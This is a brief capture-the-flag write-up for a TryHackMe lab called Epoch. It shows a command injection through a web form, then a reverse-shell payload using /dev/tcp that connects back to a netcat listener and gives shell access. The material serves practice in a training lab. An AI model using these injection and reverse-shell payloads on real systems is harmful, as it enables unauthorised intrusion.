# THM - Epoch

## Linux command injection

We got a website where we can pass passes our input right along to a command-line program. I tested basic command injection :

```bash
;id
```

And the website response were :

```
date: invalid date '@'
uid=1000(challenge) gid=1000(challenge) groups=1000(challenge)
```

Okay, need to forge a reverse shell with this command injection :

```bash
;sh -i >& /dev/tcp/10.8.17.62/9001 0>&1
```

Yeah, get in :

```bash
nc -lvnp 9001        
listening on [any] 9001 ...
connect to [10.8.17.62] from (UNKNOWN) [10.10.104.251] 54482
sh: 0: can't access tty; job control turned off
$ id
uid=1000(challenge) gid=1000(challenge) groups=1000(challenge)
```
